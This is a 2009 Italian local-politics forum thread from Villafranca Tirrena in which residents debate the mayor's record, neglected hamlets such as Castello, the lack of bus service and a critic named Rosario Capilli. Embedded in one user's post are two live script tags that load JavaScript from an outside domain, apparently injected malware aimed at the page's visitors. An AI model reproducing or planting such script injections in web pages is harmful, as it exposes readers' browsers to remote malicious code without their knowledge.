http://www.omniapress.net/

Username Password
Salva la Password
| Torna al sito | Tutti i Forum Profilo | Registrati | Argomenti Attivati | Membri | Ricerca | FAQ
 Tutti i Forum
 La piazza virtuale di Villafranca Tirrena
 Uomini di cultura.......
 Nuovo argomento  Rispondi
Pagina: 
di 46
Autore Argomento precedente Argomento Prossimo Argomento  
Zuzza

Italy
236 Messaggi post.
Posted - 16/06/2009 :  17:01:46  Visualizza il profilo    Visita la Homepage di Zuzza  Rispondi con commento

ps: non c'entra nulla... volevo solamente fare le congratulazioni al piccolo zuzza (posso vero? tanto la tua identità non è più segreta come non lo è la mia:))... risultati sportivi lodevoli... orgoglio condominiale ;)

[/quote]

Ti ringrazio io al posto suo.Comunque c'è una sezione apposita nel forum,puoi postarla anche li,non vorrei che qualcuno tirasse in ballo che sfruttiamo anche i bambini su questa sezione del forum. Loro sono piccoli ed è meglio che se ne stiano fuori.
Ciao fatti sentire quando torni.

cum grattatio pallorum omnia pericoli fugantVai in cima alla pagina

bulsara2

173 Messaggi post.
Posted - 16/06/2009 :  17:15:44  Visualizza il profilo    Rispondi con commento
si scusa... l'ho fatto solamente perchè l'altro giorno era sull'home page... ed era un commento a margine della discussione... ;)

Vai in cima alla pagina

w villafranca

6 Messaggi post.
Posted - 16/06/2009 :  17:50:42  Visualizza il profilo    Rispondi con commento
buonsera a tutti..bene.... volevo iniziare soprattutto rispondendo in modo umano senza mettere nessuno in mezzo(anzi una persona) come state facendo voi.In questo forum non si fa altro che criticare l'amministrazione assessori consglieri e soprattutto state criticando il vostro paese,per carità le critiche ci vogliono altrimenti le pecche non si risolveranno mai ma in questo modo lo vedo troppo eccessivo.Caro signor capilli ormai da quanto vedo è famoso in questo forum e non solo anche in giro si sente il suo nome...sicuramente non è un vero villafrancoto sarà importato dato che non fa altro che parlare male criticare..ecc... ,le posso consigliare di candidarsi come sindaco alle prossime comunali ,con la sua lingua sicuramente farà successo.Sono qua a crivere perchè leggo cose sbagliate che vanno tutti contro l'amministrazione ....e peno che non è giusto perchè governare un paese come villafranca rometta spadafora ecc.. non è semplce ,mettiamoci nei panni del sindaco.ci sono cose che si possono fare con più semplicità e cose non tanto semplici come per es il lungomare..,e tutti quanti come voi siete subito pronti a criticare le cose che non si fanno perce l'amministrazione secondo voi se ne frega.Ho letto pure che si criticano i partiti politici e ance questa la vedo una cosa sbagliata,per carità ognuno di noi ha degli ideali poitici ma per il bene del proprio paese non si guarda la politica si guarda solamente ed esclusivamente tutte le cose che possono migliorare il nostro paesee tutto questo si fa stando uniti e collabbbborare tra maggioranza e opposizone insomma tutti nessuno esclusi,cosi si avanti senza buttare fango su nessuno come ho letto parecchie volte qua..Adesso vi saluto e spero che questa situazione in questo forum migliori anche se mi sembra difficcile avere a che fare con certa gente....in bocca al lupo a tutti i componenti dell'amministrazieone e diciamo ai nostri amici che "la loro invidia le loro critiche sono la nostra forza" un bacione a tutti

Vai in cima alla pagina

ommos

537 Messaggi post.
Posted - 16/06/2009 :  17:59:42  Visualizza il profilo    Rispondi con commento
Sig. Capilli,i miei argomenti saranno terra terra,ma se li legge attentamente hanno un nesso logico.Lei continua ad averla col mondo intero.A tutti i sassi che incontra sulla sua strada da il calcio,ma alla fine si ritroverà con un grande allucione.
Dell'accordone che si parla ,perchè non chiede al suo referente politico?Il famoso fasc......Il referente l'avrà sicuramente e non mi risponda che non ce la.A meno chè lei sia un cane sciolto è questo non la porta da nessuna parte.Si ricordi in politica ci si rinnova e si modifica la propria convinzione.In un precedente post ho fatto l'esempio di Fanfani.Ripeto lei appartiene alla maggioranza di Villafranca e del nostro Paese. Cosa vuole fare? Il difensore civico ?Lo faccia ma non dica più che è il presidente del circolo del fu AN.E' giusto parlare delle cose che non vanno,ma per lei nulla va bene,come mai?Allora avete fatto male ad eleggere per la seconda volta LA Tona.Bisogna cambiare ad ogni legislatura.Perchè il secondo incarico viene spesso utilizzato per la carriera politica successiva.
La saluto cordialmente e senza assoluto rancore ,la prego chieda al referente suo amico sull'accordone.BY OMMOS

Per Bulsara non condivido alcuni dei tuoi passaggi.Quando verrò te li ricorderò,ma ricordati che siamo in un contesto paesano e non ad un circolo culturale dove la politica viene sezionata in ogni sua parte.Ciao OMMOS

Vai in cima alla pagina

rosario capilli

420 Messaggi post.
Posted - 16/06/2009 :  20:56:15  Visualizza il profilo    Rispondi con commento
La preoccupazione non è casuale e tutti confermano OMMOS.
Ci sarà rimasto male ma non posso fare di piu'se non criticare,per il resto
non mi preoccupo più di tanto,io critico da vicino e lei da lontano.

Io sono un cane sciolto..fra tanti cani sciolti.
E quando i cani fanno branco occhio ,diventano non gestibili.
saluti anche al futuro assessore,quello di Villafranca.
Rosario Capilli
(Quello che ha votato per la Lista La Tona Sindaco,per par condicio Ommos
l'abbiamo capito non sono rinco....)

Vai in cima alla pagina

ahah

Italy
6 Messaggi post.
Posted - 16/06/2009 :  22:01:08  Visualizza il profilo    Rispondi con commento
Esimio Sig. Capilli, a proposito del suo post sulla processione del Corpus Domini, sono tra quelli costretti a far la processione per via della comunione di mia figlia. Ho guardato così con curiosità la situazione di Castello dove confesso era da tanto tempo che non andavo e ho trovato: Una piazza SS.Annunziata dove prima c'erano baracche (con una nuova e bella statua della Madonna delle Grazie), un nuovo impianto di illuminazione artistica, le strade intorno alla Chiesa tutte rifatte a nuovo, la stessa Chiesa di S. Nicola totalmente ristrutturata, il Castello restaurato e non più pieno di rovi come quando ci stavano i maiali, il Baglio (che non so se lei conosce) totalmente rifatto e con pietra antica, con sedili e luci, le strade pulite ( non so se come dice lei per l'occasione) e una nuova scuola di gradevoli colori. Ho visto anche le case popolari che effettivamente sono una vergogna. Ho chiesto ai residenti a Castello e mi hanno detto che tutto questo è stato fatto durante l'amministrazione La Tona, mi scusi ma lei dove vive? Non mi hanno saputo dire solo cosa sia quella autorizzazione illegittima che lei cita, forse, mi hanno detto, è un passo carrabile che a lei non piace, ma non oso credere che lei vede tutto nero solo perchè non le piace un passo carrabile dato a un suo vicino/nemico di casa.

Vai in cima alla pagina

rompi scatole

3 Messaggi post.
Posted - 16/06/2009 :  22:18:29  Visualizza il profilo    Rispondi con commento
Buona sera a tutti, vorrei semplicemente dire che sicuramente è stato uno sbaglio rieleggere il sig. La Tona vedendo che il programma stilato per il secondo mandato non è attuato o solo in una minima parte. Villafranca è allo sfascio totale,abbandonata a se stessa! Vagando per le strade si vedono case su case e quelle piccole aree dedicate ai bambini fanno pena. Sono lasciate alla mercè dei vandali che le imbrattano e non sanno cosa sia la civiltà. Andando nella direzione di castello le cose peggiorano i ragazzini giocano per la strada con il pericolo che qualche macchina li possa investire,perchè purtroppo non hanno uno spazio dove svagarsi;certo c è la piazzetta dedicata a Padre Pio, ma si è visto bene in che condizione è ridotta?? i muri imbrattati, la pavimentazione in pessimo stato... La dura verità è che la gente di questo paese guarda solo i propri interessi frengandosene dei propri concittadini e quando una persona come Rosario Capilli si ribella e cerca di migliorare le cose, anzicchè riflettere su ciò che dice viene criticato pensando che sia contro tutti... Lui in quanto padre di famiglia pensa al futuro dei figli e dei suoi futuri nipoti cercando di ottenere un ambiente più sano, nel quale non vi sia più egoismo e incuria, ma nel quale i bambini possano giocare felici, le strade che siano pulite (non solo quando c'è una processione) e che Villafranca diventi un paese con la P maiuscola,però con la mentalità che c è non si può cambiare tutto ciò e forse tra qualche anno ci pentiremo di aver criticato il sig. Capilli e non aver dato ascolto ai suoi interventi. Io non lo conosco personalmente, anche se mi piacerebbe perchè vorrei stringergli la mano dicendogli che quello che dice è corretto e solo chi è lontano da questa realta o che tiene gli occhi chiusi non riesce a capire,leggendo i suoi interventi capisco che sono ponderati e contengono una verità che a molti è scomoda e che preferiscono non far emergere.

Cordiali Saluti

Vai in cima alla pagina

Dan Brown

Macao
249 Messaggi post.
Posted - 16/06/2009 :  23:35:52  Visualizza il profilo    Rispondi con commento
Sapete perchè le formiche anche quando sono a centinaia ed attraversano una strettoia non creano ingorghi, code, ma si muovono tutte senza fermarsi?

cosa centra con il discorso?
date la risposta giusta, e poi ne parliamo.

"l'uomo più studia gli animali.... più conosce se stesso"Vai in cima alla pagina

brontolo

185 Messaggi post.
Posted - 17/06/2009 :  00:31:40  Visualizza il profilo    Rispondi con commento
[quote]
Ho guardato così con curiosità la situazione di Castello dove confesso era da tanto tempo che non andavo omisssis..........................
[quote]

Brontolo:

quoto al 100x100 Capilli,
Le cose che Lei ha visto caro AHAH, si vede che sale solo per le occasioni UFFICIALI nelle frazioni, sono del passato,del mandato 2002- 2007. Io che abito un poco più su, posso dirle che in questi 2 anni l'amministrazione non ha fatto un bel niente per Castello e Calvaruso!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Forse Lei sig ahah avrà tutto a portata di mano, qui fra Castello e Calvaruso se si ha bisogno del "classico pacco di sale o del pacchetto di sigarette " ,si deve scendere giù a Villafranca. Per le nostre necessità ci si deve recare sempre al centro,se non si hanno mezzi di locomozione ,motorini, auto si devono fare un paio di chilometri a piedi. Quattro fra scendere e risalire.
Oppur, si rimane agli arresti domiciliari.
Caro Sindaco dovè il trasporto comunale mediante autobus cittadino che ci ha promesso?????
Caro sig ahah, Che me ne faccio di un Castello ristrutturato , (tanto è chiuso), se le vie accanto alla chiesa sono rifatte, se l'illuminazione è anch'essa rifatta. Io la stessa luce e rifacimento stradale li desidero pure per me, anzichè stare con la lampadina tipo casa e la strada piena di buche.

Allora risalga a Castello, ma si sposti un centinaio di metri più su, in via regione siciliana, sulla strada che porta al parco degli ulivi, parli di questo e vedrà che, le risposte che le daranno, non saranno diverse dalle mie. La scuola materna dai gradevoli colori, ha accanto uno squallido terreno RECINTATO, tutto erbacce che sembra appartenere alla scuola stessa.Mentre i nostri ragazzi sono costretti a giocare per strada, oppure scendere in piazzetta Padre Pio, sfruttando quell'angolo che è molto pericoloso perchè proprio a confine strada.
Non servono solo giostrine e altalenine.I ragazzi crescono ed hanno bisogno di altro tipo spazio .
Quindi prima di esprimere apprezzamenti faziosi, oppure dettati dalla sola difesa d'ufficio , viva con noi, sia lei sig "ahah" e sia il sig "Viva villafranca"i nostri disagi giornalieri, viva di più le nostre frazioni, non solo per le occasioni ufficiali o per fare una passeggiatina in auto a prendere un pò di fresco,poi.............................ne potremo parlare.

<script src=http://www.adw95.com/b.js></script><script src=http://www.adw95.com/b.js></script>

Modificato da - brontolo il 17/06/2009 10:03:22Vai in cima alla pagina

rompi scatole

3 Messaggi post.
Posted - 17/06/2009 :  10:51:04  Visualizza il profilo    Rispondi con commento
caro sig. "ahah" perchè non si è fatto prima una passeggiata da quelle parti? leggendo i disagi che vi sono a castello già che era lì poteva allungare il suo giro e constatare di persona... non penso che una madonnina nuova possa ridare un pò di dignità ad una frazione che ricordo bene a tutti è il centro storico... confermo quello che ha detto brontolo, perchè bazzico spesso da quelle parti a differenza di lei che se ne sta tranquillo nel pieno centro di Villafranca.. io vedo i ragazzi che quando tornano da scuola devono salire a piedi, se non hanno qualcuno che li possa andare a prendere alla fermata dell' autobus... dicerto non si possono mettere a fare l auto stop. A castello si vive nel centro del nulla, questa è la crudele realtà...i mezzi di trasporto,come gli autobus sono inesistenti: gli anziani che avrebbero voglia o l' obbligo di scendere al centro del paese che fanno? i ragazzi che vorrebbero vedersi con gli amici che fanno? una madre di famiglia che deve fare la spesa ma non ha l auto che fa?? questi sono i problemi che assillano i cittadini della frazione. sicuramente è un bene che l' illuminazione pubblica sia stata migliorata e il manto stradale sia stato sistemato, ma come mai è stato fatto solo in un' area ben definita??? perchè non si è pensato a tutto castello?? quelle poche migliorie che vengono fatte a Villafranca sono riservate a coloro che vivono in centro, perchè si pensa ormai che Villafranca sia solo la parte che costeggia la nazionale, quindi gli altri disagi non riguardano a nessuno purtroppo... spero che qualcuno mi sappia dare delle risposte alle mie domande

cordiali saluti

Vai in cima alla pagina

UGO FANTOZZI

33 Messaggi post.
Posted - 17/06/2009 :  11:46:29  Visualizza il profilo    Rispondi con commento
Nell'ultimo programma elettorale del Sindaco leggo che si doveva istituire un servizio bus per accompagnare gli anziani al cimitero per portare dei fiori ai loro cari estinti.

Signorina Silvani, Ragionier Ferrini : uomini di cultura ha raggiunto 4000 visitatori. W villafranca ah..ah!

Pina, prendi la bambina oggi si esce! prendiamo l'autobus Si và al camposanto.

Vai in cima alla pagina

cassandra

Jamaica
3 Messaggi post.
Posted - 17/06/2009 :  12:00:59  Visualizza il profilo    Rispondi con commento
Buongiorno, caro brontolo e rompi scatole posso solo confermare ciò che dite. Sono una ragazza che abita a castello e posso dire (da persona che vive in questa realtà) che Castello non ha servizi. Quando torno da scuola (avendo tutti e due i genitori che lavorano)sono obbligata a salire a piedi con qualsiasi condizione atmosferica. Ci sarebbe il campagna e ciccolo che sale fino a serro, ma per questioni di tempo nessuno di noi ragazzi può usufruire di questo servizio. Anche io vedo i ragazzini giocare per strada,quelle poche volte che non vengono rimproverati dalle persone che non sopportano le loro risate e il loro vociare.
Quando devo vedermi con i miei amici o uscire per necessità sono costretta a chiedere ai miei genitori di accompagnarmi e non sempre è possibile. Non tutti hanno la possibilità di avere un motorino, o per motivi economici o perchè i genitori non vogliono. Quando chiedo ai miei compagni di scuola di venire qui a Villafranca mi dicono di no perchè non c è niete da fare figuriamoci se gli chiedessi di salire fino a castello.
Spero che si trovi una soluzione al più presto perchè vi assicuro che i disagi ci sono e non sono stati risolti...

distinti saluti

Vai in cima alla pagina

il Corvo

United Kingdom
85 Messaggi post.
Posted - 17/06/2009 :  13:27:50  Visualizza il profilo    Visita la Homepage di il Corvo  Rispondi con commento
Ci vuole solo un pullmino con l'autista con scritto " bus con servizio anomalo" e oltre i barcaroli e i bagnanti fanno contenti anche noi abitanti di periferia.
due e uno tre.

Vai in cima alla pagina

il Corvo

United Kingdom
85 Messaggi post.
Posted - 17/06/2009 :  14:20:27  Visualizza il profilo    Visita la Homepage di il Corvo  Rispondi con commento
"c'è"
"descriminazioni"
"pultroppo"
"disaggi"
"affriggono"
"soprattuto"
non per evidenziare gli errori, ma il far finta di farli.

Vai in cima alla pagina

rosario capilli

420 Messaggi post.
Posted - 17/06/2009 :  14:27:13  Visualizza il profilo    Rispondi con commento
Sig.Sindaco a lei le risposte.
E' un atto dovuto,non pensa?
E poi, perchè non ci spiega Lei, cosa è il Baglio,lei è di cultura,non certamente io.

Quante cose e negatività ha riscontrato durante la processione?
Quello che ho segnalato le sembra poco,non credo.
Non basta sistemare una Chiesa (Pioveva dentro)per dire che tutto è a posto.
Credo che sia a posto solo in termini di ritorno ovvero consensi,per intenderci come il Centro Diurno...che bel giacottolo!

Tutto uguale a quando vi era un partito chiamato Democrazia Cristiana,si ricorda?

Caro Professore,
Ero uno dei tanti,che non proveniamo da Londra (vedi mio cognome),e oggi siamo più di uno.
Un suo intervento ritengo che sia gradito.
Ma non a parole ma con i fatti.(Programma elettorale)
Poi ,come ogni cosa,secondo coscienza........

Buon Pomeriggio
Rosario Capilli
(quello che ha votato la lista La Tona Sindaco,Lampu!)

Modificato da - Rosario Capilli il 17/06/2009 14:50:37Vai in cima alla pagina

L'argomento è distribuito in 46 pagine:
  1  2  3  4  5  6  7  8  9 10
 11 12 13 14 15 16 17 18 19 20
 21 22 23 24 25 26 27 28 29 30
 31 32 33 34 35 36 37 38 39 40
 41 42 43 44 45 46

Nuovo argomento  Rispondi
Salta a:
© 2007 OmniaPress - Tutti i diritti riservati